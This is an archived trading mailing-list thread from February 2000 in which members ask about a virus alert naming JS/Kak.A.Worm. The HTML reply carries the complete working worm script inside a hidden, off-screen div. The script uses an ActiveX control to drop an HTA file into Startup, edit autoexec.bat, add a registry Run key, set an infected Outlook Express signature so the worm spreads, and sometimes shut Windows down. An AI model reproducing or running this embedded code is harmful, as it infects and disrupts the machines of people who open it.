|
PureBytes Links
Trading Reference Links
|
<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40";>
<head>
<meta http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 9">
<meta name=Originator content="Microsoft Word 9">
<link rel=File-List href="cid:filelist.xml@xxxxxxxxxxxxxxxxx";>
<link rel=Edit-Time-Data href="cid:editdata.mso@xxxxxxxxxxxxxxxxx";>
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:DoNotRelyOnCSS/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>0</w:Zoom>
<w:DocumentKind>DocumentEmail</w:DocumentKind>
<w:EnvelopeVis/>
<w:Compatibility>
<w:ForgetLastTabAlignment/>
<w:DoNotUseHTMLParagraphAutoSpacing/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:16792199 0 0 0 65791 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";}
p.MsoAutoSig, li.MsoAutoSig, div.MsoAutoSig
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";}
span.EmailStyle15
{mso-style-type:personal-reply;
mso-ansi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:navy;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1027"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body bgcolor=white lang=EN-US style='tab-interval:.5in'>
<div class=Section1>
<p class=MsoNormal><span class=EmailStyle15><font size=2 color=navy face=Arial><span
style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial'>Yes, just
finished quarantining it and get rid of it ! <o:p></o:p></span></font></span></p>
<p class=MsoNormal><span class=EmailStyle15><font size=2 color=navy face=Arial><span
style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial'><![if !supportEmptyParas]> <![endif]><o:p></o:p></span></font></span></p>
<p class=MsoNormal><span class=EmailStyle15><font size=2 color=navy face=Arial><span
style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial'><![if !supportEmptyParas]> <![endif]><o:p></o:p></span></font></span></p>
<p class=MsoNormal style='margin-left:.5in'><font size=2 color=black
face=Tahoma><span style='font-size:10.0pt;font-family:Tahoma;color:black'>-----Original
Message-----<br>
<b><span style='font-weight:bold'>From:</span></b> listmanager@xxxxxxxxxxxxxxx
[mailto:listmanager@xxxxxxxxxxxxxxx]<b><span style='font-weight:bold'>On Behalf
Of </span></b>ROBERT ROESKE<br>
<b><span style='font-weight:bold'>Sent:</span></b> Tuesday, February 15, 2000
1:02 PM<br>
<b><span style='font-weight:bold'>To:</span></b> realtraders@xxxxxxxxxxxxxxx<br>
<b><span style='font-weight:bold'>Subject:</span></b> [RT] GEN - RT virus?</span></font></p>
<p class=MsoNormal style='margin-left:.5in'><font size=3 face="Times New Roman"><span
style='font-size:12.0pt'><![if !supportEmptyParas]> <![endif]><o:p></o:p></span></font></p>
<p class=MsoNormal style='margin-left:.5in'><font size=2 color=black
face="Times New Roman"><span style='font-size:10.0pt;color:black'>Anyway to
tell if this virus was attached at the RT server or in my computer?
Anyone else getting this virus message?</span></font><font color=black><span
style='color:black;mso-color-alt:windowtext'><o:p></o:p></span></font></p>
<p class=MsoNormal style='margin-left:.5in'><font size=2 color=black
face="Times New Roman"><span style='font-size:10.0pt;color:black'>BR</span></font><font
color=black><span style='color:black;mso-color-alt:windowtext'><o:p></o:p></span></font></p>
<p class=MsoNormal style='margin-left:.5in'><font size=3 color=black
face="Times New Roman"><span style='font-size:12.0pt;color:black'> </span></font><font
color=black><span style='color:black;mso-color-alt:windowtext'><o:p></o:p></span></font></p>
<p class=MsoNormal style='margin-left:.5in'><font size=3 color=black
face="Times New Roman"><span style='font-size:12.0pt;color:black'> </span></font><font
color=black><span style='color:black;mso-color-alt:windowtext'><o:p></o:p></span></font></p>
<div style='position:absolute;right:0px;top:-20px;z-index:5'>
<p class=MsoNormal style='margin-left:.5in'><font size=2 color=black
face="Times New Roman"><span style='font-size:10.0pt;color:black'><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></OBJECT></div>
Antigen for Exchange found Unknown infected with JS/Kak.A.Worm virus.<br>
The file is currently Deleted. The message, "[RT] MKT - OEX",
was<br>
sent from ROBERT ROESKE and was discovered in IMC Queues\Inbound<br>
located at Distrivision/NORTHAMERICA/C1PLENAEXI01.<br>
<script>
<!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fsGetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed !]]%%%%%</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//-->
</script></span></font><font color=black><span style='color:black;mso-color-alt:
windowtext'><o:p></o:p></span></font></p>
</div>
</body>
</html>
</x-html>From ???@??? Tue Feb 15 18:29:11 2000
Return-Path: <listmanager@xxxxxxxxxxxxxxx>
Received: from mail.thetrellis.net ([208.179.56.11])
by purebytes.com (8.9.3/8.9.3) with SMTP id SAA00645
for <neal@xxxxxxxxxxxxx>; Tue, 15 Feb 2000 18:38:48 -0700
Received: from REALTRADERS.COM
([208.179.56.198])
by mail.thetrellis.net; Tue, 15 Feb 2000 17:32:51 -0800
Received: from crusoe.crusoe.net by realtraders.com
with SMTP (MDaemon.v2.8.5.0.R)
for <realtraders@xxxxxxxxxxxxxxx>; Tue, 15 Feb 2000 17:26:14 -0800
Received: from pgms ([206.136.71.150]) by crusoe.crusoe.net
(Post.Office MTA v3.5.3 release 223 ID# 0-52487U2500L250S0V35)
with SMTP id net; Tue, 15 Feb 2000 20:29:22 -0500
Message-ID: <004001bf781d$3ed69c20$964788ce@xxxx>
Reply-To: "swp" <swp@xxxxxxxxxx>
From: "swp" <swp@xxxxxxxxxx>
To: "<realtraders@xxxxxxxxxxxxxxx>
\"Realtraders\"" <realtraders@xxxxxxxxxxxxxxx>
References: <NBBBIJIEGOMGBKDAOOIIIEJCEMAA.spider@xxxxxxxxxxxxxxx>
Subject: [RT] Re: GEN - RT virus? - I am sending this as plain text!
Date: Tue, 15 Feb 2000 20:29:17 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
X-MDaemon-Deliver-To: realtraders@xxxxxxxxxxxxxxx
X-Return-Path: swp@xxxxxxxxxx
Sender: listmanager@xxxxxxxxxxxxxxx
X-MDMailing-List: realtraders@xxxxxxxxxxxxxxx
X-MDSend-Notifications-To: listmanager@xxxxxxxxxxxxxxx
Status:
Not exactly. I am still getting an Active X warning from this email!!!
---
Steven W. Poser, President
Poser Global Market Strategies Inc.
url: http://www.poserglobal.com
email: swp@xxxxxxxxxxxxxxx
Tel: 201-995-0845
Fax: 201-995-0846
----- Original Message -----
From: Ge Wong
To: realtraders@xxxxxxxxxxxxxxxxxxxxxxxxxx@realtraders.com
Sent: Tuesday, February 15, 2000 8:28 PM
Subject: [RT] RE: GEN - RT virus?
Yes, just finished quarantining it and get rid of it !
-----Original Message-----
From: listmanager@xxxxxxxxxxxxxxx [mailto:listmanager@xxxxxxxxxxxxxxx]On
Behalf Of ROBERT ROESKE
Sent: Tuesday, February 15, 2000 1:02 PM
To: realtraders@xxxxxxxxxxxxxxx
Subject: [RT] GEN - RT virus?
Anyway to tell if this virus was attached at the RT server or in my
computer? Anyone else getting this virus message?
BR
Antigen for Exchange found Unknown infected with JS/Kak.A.Worm virus.
The file is currently Deleted. The message, "[RT] MKT - OEX", was
sent from ROBERT ROESKE and was discovered in IMC Queues\Inbound
located at Distrivision/NORTHAMERICA/C1PLENAEXI01.
|